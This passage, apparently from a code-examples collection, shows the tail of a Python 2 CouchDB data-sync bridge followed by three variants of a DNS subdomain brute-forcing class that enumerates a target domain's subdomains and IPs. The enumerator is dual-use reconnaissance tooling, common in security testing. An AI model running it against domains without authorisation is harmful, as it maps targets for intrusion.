                logger.debug('Send check bulk: {}'.format(len(input_dict)),
                             extra={'CHECK_BULK_LEN': len(input_dict)})
                start = time()
                rows = self.db.view(self.view_path, keys=input_dict.values())
                end = time() - start
                logger.debug('Duration bulk check: {} sec.'.format(end),
                             extra={'CHECK_BULK_DURATION': end * 1000})
                resp_dict = {k.id: k.key for k in rows}
                break
            except (IncompleteRead, Exception) as e:
                logger.error('Error while send bulk {}'.format(e.message),
                             extra={'MESSAGE_ID': 'exceptions'})
                if i == 2:
                    raise e
                sleep(sleep_before_retry)
                sleep_before_retry *= 2
        for item_id, date_modified in input_dict.items():
            if item_id in resp_dict and date_modified == resp_dict[item_id]:
                logger.debug('Skipped {} {}: In db exist newest.'.format(
                    self.workers_config['resource'][:-1], item_id),
                             extra={'MESSAGE_ID': 'skipped'})
            elif ((1, item_id) not in self.resource_items_queue.queue
                  and (1000, item_id) not in self.resource_items_queue.queue):
                self.resource_items_queue.put(
                    (priority_cache[item_id], item_id))
                logger.debug(
                    'Put to main queue {}: {}'.format(
                        self.workers_config['resource'][:-1], item_id),
                    extra={'MESSAGE_ID': 'add_to_resource_items_queue'})
            else:
                logger.debug(
                    'Skipped {} {}: In queue exist with same id'.format(
                        self.workers_config['resource'][:-1], item_id),
                    extra={'MESSAGE_ID': 'skipped'})

    def fill_resource_items_queue(self):
        start_time = datetime.now()
        input_dict = {}
        priority_cache = {}
        while True:
            # Get resource_item from temp queue
            if not self.input_queue.empty():
                priority, resource_item = self.input_queue.get()
            else:
                timeout = self.bulk_query_interval -\
                    (datetime.now() - start_time).total_seconds()
                # clamp to the valid range [0, bulk_query_interval]
                timeout = max(0, min(timeout, self.bulk_query_interval))
                try:
                    priority, resource_item = self.input_queue.get(
                        timeout=timeout)
                except Empty:
                    resource_item = None

            # Add resource_item to bulk
            if resource_item is not None:
                logger.debug('Add to input_dict {}'.format(
                    resource_item['id']))
                input_dict[resource_item['id']] = resource_item['dateModified']
                priority_cache[resource_item['id']] = priority

            if (len(input_dict) >= self.bulk_query_limit
                    or (datetime.now() - start_time).total_seconds() >=
                    self.bulk_query_interval):
                if len(input_dict) > 0:
                    self.send_bulk(input_dict, priority_cache)
                    input_dict = {}
                    priority_cache = {}
                start_time = datetime.now()

    def resource_items_filter(self, r_id, r_date_modified):
        try:
            local_document = self.db.get(r_id)
            if local_document:
                if local_document['dateModified'] < r_date_modified:
                    return True
                else:
                    return False
            else:
                return True
        except Exception as e:
            logger.error(
                'Filter error: Error while getting {} {} from couchdb: '
                '{}'.format(self.workers_config['resource'][:-1], r_id,
                            e.message),
                extra={'MESSAGE_ID': 'exceptions'})
            return True

    def _get_average_requests_duration(self):
        req_durations = []
        delta = timedelta(seconds=self.perfomance_window)
        current_date = datetime.now() - delta
        for cid, info in self.api_clients_info.items():
            if len(info['request_durations']) > 0:
                if min(info['request_durations'].keys()) <= current_date:
                    info['grown'] = True
                avg = round(
                    sum(info['request_durations'].values()) * 1.0 /
                    len(info['request_durations']), 3)
                req_durations.append(avg)
                info['avg_duration'] = avg

        if len(req_durations) > 0:
            return round(sum(req_durations) / len(req_durations),
                         3), req_durations
        else:
            return 0, req_durations

    # TODO: Add logic to restart sync if the last response is greater than
    # some threshold and there are no active tasks for the resource

    def queues_controller(self):
        while True:
            if (self.workers_pool.free_count() > 0
                    and (self.resource_items_queue.qsize() >
                         ((float(self.resource_items_queue_size) / 100) *
                          self.workers_inc_threshold))):
                self.create_api_client()
                w = ResourceItemWorker.spawn(self.api_clients_queue,
                                             self.resource_items_queue,
                                             self.db, self.workers_config,
                                             self.retry_resource_items_queue,
                                             self.api_clients_info)
                self.workers_pool.add(w)
                logger.info('Queue controller: Create main queue worker.')
            elif (self.resource_items_queue.qsize() <
                  ((float(self.resource_items_queue_size) / 100) *
                   self.workers_dec_threshold)):
                if len(self.workers_pool) > self.workers_min:
                    wi = self.workers_pool.greenlets.pop()
                    wi.shutdown()
                    api_client_dict = self.api_clients_queue.get()
                    del self.api_clients_info[api_client_dict['id']]
                    logger.info('Queue controller: Kill main queue worker.')
            filled_resource_items_queue = round(
                self.resource_items_queue.qsize() /
                (float(self.resource_items_queue_size) / 100), 2)
            logger.info('Resource items queue filled on {} %'.format(
                filled_resource_items_queue))
            filled_retry_resource_items_queue = round(
                self.retry_resource_items_queue.qsize() /
                (float(self.retry_resource_items_queue_size) / 100), 2)
            logger.info('Retry resource items queue filled on {} %'.format(
                filled_retry_resource_items_queue))
            sleep(self.queues_controller_timeout)

    def gevent_watcher(self):
        self.perfomance_watcher()
        for t in self.server.tasks():
            if (t['type'] == 'indexer' and t['database'] == self.db_name
                    and t.get('design_document', None) == '_design/{}'.format(
                        self.workers_config['resource'])):
                logger.info(
                    'Watcher: Waiting for end of view indexing. Current'
                    ' progress: {} %'.format(t['progress']))

        # Check fill threads
        input_threads = 1
        if self.input_queue_filler.ready():
            input_threads = 0
            logger.error('Temp queue filler error: {}'.format(
                self.input_queue_filler.exception.message),
                         extra={'MESSAGE_ID': 'exception'})
            self.input_queue_filler = spawn(self.fill_input_queue)
        logger.info('Input threads {}'.format(input_threads),
                    extra={'INPUT_THREADS': input_threads})
        fill_threads = 1
        if self.filler.ready():
            fill_threads = 0
            logger.error('Fill thread error: {}'.format(
                self.filler.exception.message),
                         extra={'MESSAGE_ID': 'exception'})
            self.filler = spawn(self.fill_resource_items_queue)
        logger.info('Fill threads {}'.format(fill_threads),
                    extra={'FILL_THREADS': fill_threads})

        main_threads = self.workers_max - self.workers_pool.free_count()
        logger.info('Main threads {}'.format(main_threads),
                    extra={'MAIN_THREADS': main_threads})

        if len(self.workers_pool) < self.workers_min:
            for i in xrange(0, (self.workers_min - len(self.workers_pool))):
                w = ResourceItemWorker.spawn(self.api_clients_queue,
                                             self.resource_items_queue,
                                             self.db, self.workers_config,
                                             self.retry_resource_items_queue,
                                             self.api_clients_info)
                self.workers_pool.add(w)
                logger.info('Watcher: Create main queue worker.')
                self.create_api_client()
        retry_threads = self.retry_workers_max -\
            self.retry_workers_pool.free_count()
        logger.info('Retry threads {}'.format(retry_threads),
                    extra={'RETRY_THREADS': retry_threads})
        if len(self.retry_workers_pool) < self.retry_workers_min:
            for i in xrange(
                    0, self.retry_workers_min - len(self.retry_workers_pool)):
                self.create_api_client()
                w = ResourceItemWorker.spawn(self.api_clients_queue,
                                             self.retry_resource_items_queue,
                                             self.db, self.workers_config,
                                             self.retry_resource_items_queue,
                                             self.api_clients_info)
                self.retry_workers_pool.add(w)
                logger.info('Watcher: Create retry queue worker.')

        # Log queues size and API clients count
        main_queue_size = self.resource_items_queue.qsize()
        logger.info('Resource items queue size {}'.format(main_queue_size),
                    extra={'MAIN_QUEUE_SIZE': main_queue_size})
        retry_queue_size = self.retry_resource_items_queue.qsize()
        logger.info(
            'Resource items retry queue size {}'.format(retry_queue_size),
            extra={'RETRY_QUEUE_SIZE': retry_queue_size})
        api_clients_count = len(self.api_clients_info)
        logger.info('API Clients count: {}'.format(api_clients_count),
                    extra={'API_CLIENTS': api_clients_count})

    def _calculate_st_dev(self, values):
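        # population standard deviation: sqrt(mean((x - avg) ** 2))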
        if len(values) > 0:
            avg = sum(values) * 1.0 / len(values)
            variance = map(lambda x: (x - avg)**2, values)
            avg_variance = sum(variance) * 1.0 / len(variance)
            st_dev = math.sqrt(avg_variance)
            return round(st_dev, 3)
        else:
            return 0

    def _mark_bad_clients(self, dev):
        # Mark bad api clients
        for cid, info in self.api_clients_info.items():
            if info.get('grown', False) and info['avg_duration'] > dev:
                info['drop_cookies'] = True
                logger.debug('Performance watcher: Mark client {} as bad, avg.'
                             ' request_duration is {} sec.'.format(
                                 cid, info['avg_duration']),
                             extra={'MESSAGE_ID': 'marked_as_bad'})
            elif info['avg_duration'] < dev and info['request_interval'] > 0:
                info['drop_cookies'] = True
                logger.debug('Performance watcher: Mark client {} as bad,'
                             ' request_interval is {} sec.'.format(
                                 cid, info['request_interval']),
                             extra={'MESSAGE_ID': 'marked_as_bad'})

    def perfomance_watcher(self):
        avg_duration, values = self._get_average_requests_duration()
        for _, info in self.api_clients_info.items():
            delta = timedelta(seconds=self.perfomance_window +
                              self.watch_interval)
            current_date = datetime.now() - delta
            delete_list = []
            for key in info['request_durations']:
                if key < current_date:
                    delete_list.append(key)
            for k in delete_list:
                del info['request_durations'][k]

        st_dev = self._calculate_st_dev(values)
        if len(values) > 0:
            min_avg = min(values) * 1000
            max_avg = max(values) * 1000
        else:
            max_avg = 0
            min_avg = 0
        dev = round(st_dev + avg_duration, 3)

        logger.info('Performance watcher:\nREQUESTS_STDEV - {} sec.\n'
                    'REQUESTS_DEV - {} sec.\nREQUESTS_MIN_AVG - {} ms.\n'
                    'REQUESTS_MAX_AVG - {} ms.\nREQUESTS_AVG - {} sec.'.format(
                        round(st_dev, 3), dev, min_avg, max_avg, avg_duration),
                    extra={
                        'REQUESTS_DEV': dev * 1000,
                        'REQUESTS_MIN_AVG': min_avg,
                        'REQUESTS_MAX_AVG': max_avg,
                        'REQUESTS_AVG': avg_duration * 1000
                    })
        self._mark_bad_clients(dev)

    def run(self):
        logger.info('Start Edge Bridge',
                    extra={'MESSAGE_ID': 'edge_bridge_start_bridge'})
        logger.info('Start data sync...',
                    extra={'MESSAGE_ID': 'edge_bridge__data_sync'})
        self.input_queue_filler = spawn(self.fill_input_queue)
        self.filler = spawn(self.fill_resource_items_queue)
        spawn(self.queues_controller)
        while True:
            self.gevent_watcher()
            sleep(self.watch_interval)
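
A minimal launch sketch for the bridge above. The nested 'main' section matches what config_get() expects; the specific keys and values are illustrative assumptions, not a documented configuration file.

# Hypothetical usage sketch -- config keys and values are assumptions.
if __name__ == '__main__':
    config = {
        'main': {
            'resources_api_server': 'https://api.example.org',
            'resources_api_version': '2.3',
            'retrievers_params': {'up_wait_sleep': 30},
            'couch_url': 'http://127.0.0.1:5984',
            'db_name': 'edge_db',
        }
    }
    EdgeDataBridge(config).run()
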
Example #28
class SubNameBrute:
    def __init__(self, target, options):
        self.start_time = time.time()
        self.target = target.strip()
        self.options = options
        self.ignore_intranet = options.i
        self.scan_count = self.found_count = 0
        self.console_width = getTerminalSize()[0] - 2
        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.threads)]
        for _ in self.resolvers:
            _.lifetime = _.timeout = 10.0
        self.print_count = 0
        self.STOP_ME = False
        self._load_dns_servers()
        self._load_next_sub()
        self.queue = PriorityQueue()
        self.priority = 0
        self._load_sub_names()
        if options.output:
            outfile = options.output
        else:
            _name = os.path.basename(self.options.file).replace('subnames', '')
            if _name != '.txt':
                _name = '_' + _name
            outfile = target + _name if not options.full_scan else target + '_full' + _name
        self.outfile = open(outfile, 'w')
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = self.dns_servers

    def _load_dns_servers(self):
        print '[+] Validate DNS servers ...'
        self.dns_servers = []
        pool = Pool(30)
        for server in open('dict/dns_servers.txt').xreadlines():
            server = server.strip()
            if server:
                pool.apply_async(self._test_server, (server,))
        pool.join()

        self.dns_count = len(self.dns_servers)
        sys.stdout.write('\n')
        print '[+] Found %s available DNS Servers in total' % self.dns_count
        if self.dns_count == 0:
            print '[ERROR] No DNS Servers available.'
            sys.exit(-1)

    def _test_server(self, server):
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0
        try:
            resolver.nameservers = [server]
            answers = resolver.query('public-dns-a.baidu.com')    # test lookup of a known domain
            if answers[0].address != '180.76.76.76':
                raise Exception('incorrect DNS response')
            try:
                resolver.query('test.bad.dns.lijiejie.com')    # non-existent domain test
                with open('bad_dns_servers.txt', 'a') as f:
                    f.write(server + '\n')
                self._print_msg('[+] Bad DNS Server found %s' % server)
            except:
                self.dns_servers.append(server)
            self._print_msg('[+] Check DNS Server %s < OK >   Found %s' % (server.ljust(16), len(self.dns_servers)))
        except:
            self._print_msg('[+] Check DNS Server %s <Fail>   Found %s' % (server.ljust(16), len(self.dns_servers)))

    def _load_sub_names(self):
        self._print_msg('[+] Load sub names ...')
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('dict/%s' % self.options.file):
                _file = 'dict/%s' % self.options.file
            else:
                self._print_msg('[ERROR] Names file does not exist: %s' % self.options.file)
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f.xreadlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        pattern = '|'.join(regex_list)
        if pattern:
            _regex = re.compile(pattern)
            if _regex:
                for line in normal_lines[:]:
                    if _regex.search(line):
                        normal_lines.remove(line)

        for item in normal_lines:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines:
            self.queue.put((88888888, item))

    def _load_next_sub(self):
        self._print_msg('[+] Load next level subs ...')
        self.next_subs = []
        _set = set()
        _file = 'dict/next_sub.txt' if not self.options.full_scan else 'dict/next_sub_full.txt'
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in self.next_subs:
                    tmp_set = {sub}
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                tmp_set.add(item.replace('{alphnum}', _letter, 1))
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace('{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in _set:
                            _set.add(item)
                            self.next_subs.append(item)

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            self.print_count += 1
            if self.print_count < 100:
                return
            self.print_count = 0
            msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
        elif _msg.startswith('[+] Check DNS Server'):
            sys.stdout.write('\r' + _msg + ' ' * (self.console_width - len(_msg)))
        else:
            sys.stdout.write('\r' + _msg + ' ' * (self.console_width - len(_msg)) + '\n')
            if _found_msg:
                msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                    self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
        sys.stdout.flush()

    @staticmethod
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        # 172.16.0.0/12 covers 172.16.0.0 - 172.31.255.255
        if ret[0] == '172' and 16 <= int(ret[1]) <= 31:
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    def put_item(self, item):
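        # fully expanded names (no placeholders left) get a monotonically
        # increasing priority, preserving FIFO order; every remaining
        # placeholder pushes the item 10,000,000 slots back so that
        # concrete names are always dequeued first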
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=1.0)[1]
                self.scan_count += 1
            except:
                break
            self._print_msg()
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer, e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.ignore_intranet and SubNameBrute.is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count += 1
                        answers = self.resolvers[j].query(cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) - 1]    # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1

                    if ips not in self.ip_dict:
                        self.ip_dict[ips] = 1
                    else:
                        self.ip_dict[ips] += 1

                    if self.ip_dict[(_sub, ips)] > 3 or self.ip_dict[ips] > 6:
                        continue

                    self.found_count += 1
                    msg = cur_sub_domain.ljust(30) + ips
                    self._print_msg(msg, _found_msg=True)
                    self._print_msg()
                    self.outfile.write(cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()
                    try:
                        self.resolvers[j].query('lijiejietest.' + cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout) as e:
                pass
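
A hedged driver for the scanner above, assuming a gevent monkey-patched process; the real script builds its options with optparse, so a namedtuple stands in here.

# Hypothetical driver -- the options object is faked for illustration.
from collections import namedtuple
import gevent

Options = namedtuple('Options', 'i threads full_scan file output')
options = Options(i=False, threads=60, full_scan=False,
                  file='subnames.txt', output=None)
brute = SubNameBrute('example.com', options)
gevent.joinall([gevent.spawn(brute._scan, j)
                for j in range(options.threads)])
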
Example #29
class SubNameBrute:
    def __init__(self, target, options):
        # save result to list
        self.subdomains = list()
        self.start_time = time.time()
        self.target = target.strip()
        self.options = options
        self.ignore_intranet = options.i
        self.scan_count = self.found_count = 0
        self.console_width = getTerminalSize()[0] - 2
        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.threads)]
        for _ in self.resolvers:
            _.lifetime = _.timeout = 10.0
        self.STOP_ME = False
        self._load_dns_servers()
        self._load_next_sub()
        self.queue = PriorityQueue()
        self.priority = 0
        self._load_sub_names()
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = self.dns_servers

    def _load_dns_servers(self):
        self.dns_servers = []
        pool = Pool(30)
        for server in open('dict/dns_servers.txt').xreadlines():
            server = server.strip()
            if server:
                pool.apply_async(self._test_server, (server,))
        pool.join()

        self.dns_count = len(self.dns_servers)
        sys.stdout.write('\n')
        if self.dns_count == 0:
            sys.exit(-1)

    def _test_server(self, server):
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0
        try:
            resolver.nameservers = [server]
            answers = resolver.query('public-dns-a.baidu.com')    # test lookup of a known domain
            if answers[0].address != '180.76.76.76':
                raise Exception('incorrect DNS response')
            try:
                resolver.query('test.bad.dns.lijiejie.com')    # non-existent domain test
                with open('bad_dns_servers.txt', 'a') as f:
                    f.write(server + '\n')
            except:
                self.dns_servers.append(server)
        except:
            pass

    def _load_sub_names(self):
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('dict/%s' % self.options.file):
                _file = 'dict/%s' % self.options.file
            else:
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f.xreadlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        pattern = '|'.join(regex_list)
        if pattern:
            _regex = re.compile(pattern)
            if _regex:
                for line in normal_lines[:]:
                    if _regex.search(line):
                        normal_lines.remove(line)

        for item in normal_lines:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines:
            self.queue.put((88888888, item))

    def _load_next_sub(self):
        self.next_subs = []
        _set = set()
        _file = 'dict/next_sub.txt' if not self.options.full_scan else 'dict/next_sub_full.txt'
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in self.next_subs:
                    tmp_set = {sub}
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                tmp_set.add(item.replace('{alphnum}', _letter, 1))
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace('{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in _set:
                            _set.add(item)
                            self.next_subs.append(item)

    @staticmethod
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        # 172.16.0.0/12 covers 172.16.0.0 - 172.31.255.255
        if ret[0] == '172' and 16 <= int(ret[1]) <= 31:
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    def put_item(self, item):
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=1.0)[1]
                self.scan_count += 1
            except:
                break
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer, e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.ignore_intranet and SubNameBrute.is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count += 1
                        answers = self.resolvers[j].query(cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) - 1]    # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1

                    if ips not in self.ip_dict:
                        self.ip_dict[ips] = 1
                    else:
                        self.ip_dict[ips] += 1

                    if self.ip_dict[(_sub, ips)] > 3 or self.ip_dict[ips] > 6:
                        continue

                    self.found_count += 1
                    msg = cur_sub_domain.ljust(30) + ips

                    # save result to list
                    self.subdomains.append([cur_sub_domain, ips])

                    try:
                        self.resolvers[j].query('lijiejietest.' + cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout) as e:
                pass
Example #30
class SubNameBrute:
    def __init__(self, target, options):
        self.start_time = time.time()
        self.target = target.strip()
        self.options = options
        self.ignore_intranet = options.i
        self.scan_count = self.found_count = 0
        self.console_width = getTerminalSize()[0] - 2
        self.resolvers = [
            dns.resolver.Resolver(configure=False)
            for _ in range(options.threads)
        ]
        for _ in self.resolvers:
            _.lifetime = _.timeout = 10.0
        self.print_count = 0
        self.STOP_ME = False
        self._load_dns_servers()
        self._load_next_sub()
        self.queue = PriorityQueue()
        self.priority = 0
        self._load_sub_names()
        if options.output:
            outfile = options.output
        else:
            _name = os.path.basename(self.options.file).replace('subnames', '')
            if _name != '.txt':
                _name = '_' + _name
            outfile = target + _name if not options.full_scan else target + '_full' + _name
        self.outfile = open(outfile, 'w')
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = self.dns_servers
        self.result_lines = []
        self.result_domains = []
        self.result_ips = []

    def _load_dns_servers(self):
        print '[+] Validate DNS servers ...'
        self.dns_servers = []
        pool = Pool(30)

        # change file location
        for server in open('lijiejie/' + 'dict/dns_servers.txt').xreadlines():
            server = server.strip()
            if server:
                pool.apply_async(self._test_server, (server, ))
        pool.join()

        self.dns_count = len(self.dns_servers)
        sys.stdout.write('\n')
        print '[+] Found %s available DNS Servers in total' % self.dns_count
        if self.dns_count == 0:
            print '[ERROR] No DNS Servers available.'
            sys.exit(-1)

    def _test_server(self, server):
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0
        try:
            resolver.nameservers = [server]
            answers = resolver.query(
                'public-dns-a.baidu.com')  # test lookup of a known domain
            if answers[0].address != '180.76.76.76':
                raise Exception('incorrect DNS response')
            try:
                resolver.query(
                    'test.bad.dns.lijiejie.com')  # non-existent domain test
                with open('bad_dns_servers.txt', 'a') as f:
                    f.write(server + '\n')
                self._print_msg('[+] Bad DNS Server found %s' % server)
            except:
                self.dns_servers.append(server)
            self._print_msg('[+] Check DNS Server %s < OK >   Found %s' %
                            (server.ljust(16), len(self.dns_servers)))
        except:
            self._print_msg('[+] Check DNS Server %s <Fail>   Found %s' %
                            (server.ljust(16), len(self.dns_servers)))

    def _load_sub_names(self):
        self._print_msg('[+] Load sub names ...')
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'lijiejie/' + 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('lijiejie/' + 'dict/%s' % self.options.file):
                _file = 'lijiejie/' + 'dict/%s' % self.options.file
            else:
                self._print_msg('[ERROR] Names file does not exist: %s' %
                                self.options.file)
                exit(-1)

        if self.options.debug:
            _file = 'lijiejie/' + 'dict/debug.txt'
            if not os.path.exists(_file):
                self._print_msg('[ERROR] Names file does not exist: %s' %
                                self.options.file)
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f.xreadlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find(
                        '{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        pattern = '|'.join(regex_list)
        if pattern:
            _regex = re.compile(pattern)
            if _regex:
                for line in normal_lines[:]:
                    if _regex.search(line):
                        normal_lines.remove(line)

        for item in normal_lines:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines:
            self.queue.put((88888888, item))

    def _load_next_sub(self):
        self._print_msg('[+] Load next level subs ...')
        self.next_subs = []
        _set = set()
        _file = 'lijiejie/' + 'dict/next_sub.txt' if not self.options.full_scan else 'lijiejie/' + 'dict/next_sub_full.txt'
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in self.next_subs:
                    tmp_set = {sub}
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
